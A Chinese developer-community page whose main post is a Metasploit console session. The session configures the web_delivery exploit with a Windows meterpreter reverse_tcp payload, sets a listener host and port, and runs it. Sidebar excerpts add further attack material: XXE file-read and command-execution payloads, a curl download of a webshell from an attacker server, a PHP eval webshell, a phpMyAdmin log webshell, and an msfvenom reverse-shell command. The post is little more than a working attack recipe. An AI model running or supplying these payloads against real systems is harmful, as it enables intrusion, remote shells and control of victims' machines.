Loading [MathJax]/jax/output/CommonHTML/config.js

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >exploit/multi/script/web_delivery

exploit/multi/script/web_delivery

原创

作者头像

浪子云

修改于 2022-07-23 02:14:08

修改于 2022-07-23 02:14:08

52600

代码可运行

举报

文章被收录于专栏：子云笔记子云笔记

运行总次数：0

代码可运行

msf6> use exploit/multi/script/web_delivery 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.63.142
lhost => 192.168.63.142
msf6 exploit(multi/script/web_delivery) > set lport 7878
lport => 7878
msf6 exploit(multi/script/web_delivery) > run

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

评论

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

多租户的 4 种常用方案

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

60页PPT全解：DeepSeek系列论文技术要点整理

exploit/windows/local/cve_2022_21882_win32k

msf6 exploit(windows/local/cve_2022_21882_win32k) > sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ----

浪子云

2022/08/17

4780

CISP-PTS中的渗透小技巧分享

技巧脚本路由协议公众号

1.3、XXE相关技巧 1.3.1、XXE载荷构技巧使用seclists的XXE-Fuzzing.txt的第9行，做一个简单改造即可使用。对比如下：改造前： <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 改造后： <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> XXE-Fuzzing.txt的路径：SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后，再加上回显位置即可成功利用，完整载荷示例： <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "file:///etc/passwd" >]> <name> <email> &foo; </email> </name> 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://id" >]> <name> <email> &foo; </email> </name> getshell则是命令执行的变种，通过上传webshell来。利用前提：知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上，直接寄。 1）使用python托管webshell python -m http.server 8088 2）下载webshell <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY foo SYSTEM "expect://curl$IFS'vps_addr:port/111.php'$IFS-o$IFS'222.php'" >]> <name> <email> &foo; </email> </name> 此处webshell下载解析： curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代，没啥好说的，常规思路。下载url不能带协议下载url用单引号包裹，如果是-o方式，保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传这个跟.htaccess差不多，.user.ini是php给用户的自定义配置文件，可将指定文件按照php脚本文件的形式解析。介绍：https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程： 1）上传.user.ini filename：.user.ini Content-type：image/jpeg 文件正文： GIF89a auto_prepend_file = aaa.jpg 2）上传webshell filename: aaa.jpg Content-type：image/jpeg 文件正文： GIF89a <?php @eval($_POST[22]);?> # 可替换为其他webshell 1.5、盲注分析导出数据包：文件——导出分组解析结果——为纯文本通过notepad++解码：提取所有注入数据包，此处使用notepad++中的标记功能，查找模式设置为正则表达式。提取出来以后，找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。找到所有数据后，用英文的逗号隔开，然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马前提：知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "<?php @eval($_POST[22]);?>" web根目

潇湘信安

2024/07/04

2570

CISP-PTS中的渗透小技巧分享

使用MSF生成各种Payload

python windows linux

Windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe Linux: msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻

王瑞MVP

2022/12/28

6060

红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队，那就对自己狠一点]

root 程序工具进程 linux

盛透侧视攻城狮

2024/12/25

1410

红队/白帽必经之路(22)——实战之如何通过Metasploit 及Vegile 维吉尔工具制作Linux无文件木马程序root down[既然是红队，那就对自己狠一点]

基于Metasploit的软件渗透测试

windows tcp/ip http 漏洞扫描服务安全

Windows 2000 Professional 链接：https://pan.baidu.com/s/13OSz_7H1mIpMKJMq92nEqg?pwd=upsm 提取码：upsm Win

顾翔

2022/09/23

3.9K0

基于Metasploit的软件渗透测试

vulntarget漏洞靶场系列（二）— vulntarget-b

tcp/ip 网站访问管理 php http

星期五实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全

2021/12/28

3.2K0

vulntarget漏洞靶场系列（二）— vulntarget-b

渗透测试中常用powershell（一）

https 网络安全

参考：https://www.anquanke.com/post/id/86241

Jumbo

2019/03/07

1.9K0

内网靶场初探

工具脚本连接漏洞权限

内容写的很乱，因为第一次搞，有点不太熟练，所以各位师傅简单看看就好，写的比较好的文章，可以参考这两个 https://xz.aliyun.com/t/11588#toc-0 https://mp.weixin.qq.com

用户9691112

2023/05/18

7200

红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队，那就对自己狠一点]

root 软件终端 linux shell

盛透侧视攻城狮

2024/12/25

2210

红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队，那就对自己狠一点]

1.1 Metasploit 工具简介

Metasploit 简称（MSF）是一款流行的开源渗透测试框架，由Rapid7公司开发，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具，可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台，包括Windows、Linux、MacOS等。直到今天Metasploit已成为众多黑客手中渗透攻击的利器，并在安全领域大展身手。

王瑞MVP

2023/06/30

5380

1.1 Metasploit 工具简介

利用 TCP 隧道让内网不出网主机上线 MSF

在获得一台内网跳板机权限之后，想让相同内网其他主机上线 MSF，由于只有跳板机可以出网，如何能让其他不出网主机通过跳板机上线 MSF 呢？

信安之路

2022/04/07

2.3K0

利用 TCP 隧道让内网不出网主机上线 MSF

红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队，那就对自己狠一点]

windows exe 软件 shell 小程序

盛透侧视攻城狮

2024/12/25

1390

红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队，那就对自己狠一点]

干货 | Certutil在渗透中的利用和详解

http 缓存 https windows powershell

certutil.exe 是一个合法Windows文件，用于管理Windows证书的程序。

HACK学习

2021/07/21

6.5K0

靶机渗透-Vulnerable Docker1 Hard

容器代理漏洞源码 http

用Metasploit中的exploit/unix/webapp/wp_admin_shell_upload

故里[TRUE]

2024/02/15

2620

靶机渗透-Vulnerable Docker1 Hard

红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队，那就对自己狠一点]

网络远程桌面主机 windows 漏洞

盛透侧视攻城狮

2024/12/25

2340

红队/白帽必经之路(20)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透[既然是红队，那就对自己狠一点]

tcp/ip 网络安全

环境攻击机：Kali，192.168.100.2 CS：监听器端口8080 MSF：监听端口9999 靶机：Win7，192.168.100.4 MSF上线主机给CS 场景：当MSF有了一个Session会话，利用MSF注入功能，加载CS的Payload MSF需要先拿到Shell。这里使用msfvenom生成一个恶意木马，并上传到靶机 $ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=<MSF_IP> lport=<MSF_Port> -f

Naraku

2021/07/29

2.1K0

经验总结 | CS与MSF之间的会话传递

tcp/ip https http android 网络安全

众所周知，Cobalt Strike 的前身是 Armitage，而 Armitage 又可以理解为 Metasploit Framework 的图形界面版，因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的，所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上，同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework

TeamsSix

2021/02/04

3.9K0

红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队，那就对自己狠一点!!!]

x86 软件 shell windows size

盛透侧视攻城狮

2024/12/25

2020

红队/白帽必经之路(17)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[既然是红队，那就对自己狠一点!!!]

CobaltStrike 和 Metasploit 联动

安全 shell 腾讯云测试服务网络安全网站

个人觉得CobaltStrike图形化的界面和丰富的功能，是一个超强的后渗透框架，尤其是方便管理横向移动过程中搜集到的各种数据和shell，但是对于漏洞利用、初始突破就显得十分乏力；另一边Metasploit作为漏洞利用框架，EXP及其顺滑，各种各样的模块，包含扫描、突破、拓展一条龙服务，但是对于多个shell的管理就显得有些乏力了（毕竟没有图形化界面，命令太多记不住）。于是，如何将两个框架有效的联动起来，就成为了今天想要学习的知识。

Ms08067安全实验室

2021/03/16

1.9K0

CobaltStrike 和 Metasploit 联动

CVE-2019-9848 LibreOffice < 6.2.5 任意python命令执行漏洞复现

windows server python 网络安全安全

LibreOffice是OpenOffice.org 办公套件衍生版，同样自由开源，以Mozilla Public License V2.0许可证分发源代码，但相比OpenOffice增加了很多特色功能。LibreOffice拥有强大的数据导入和导出功能，能直接导入PDF文档、微软Works、LotusWord，支持主要的OpenXML格式。软件本身并不局限于Debian和Ubuntu平台，OpenXML格式Windows、Mac、PRM packageLinux等多个系统平台。

用户1631416

2019/08/09

2.1K0

相关推荐

exploit/windows/local/cve_2022_21882_win32k

更多 >

LV.3

这个人很懒，什么都没有留下～

作者相关精选

换一批

加入讨论

的问答专区 >

💥开发者 MCP广场重磅上线！

精选全网热门MCP server，让你的AI更好用 🚀

本文部分代码块支持一键运行，欢迎体验

本文部分代码块支持一键运行，欢迎体验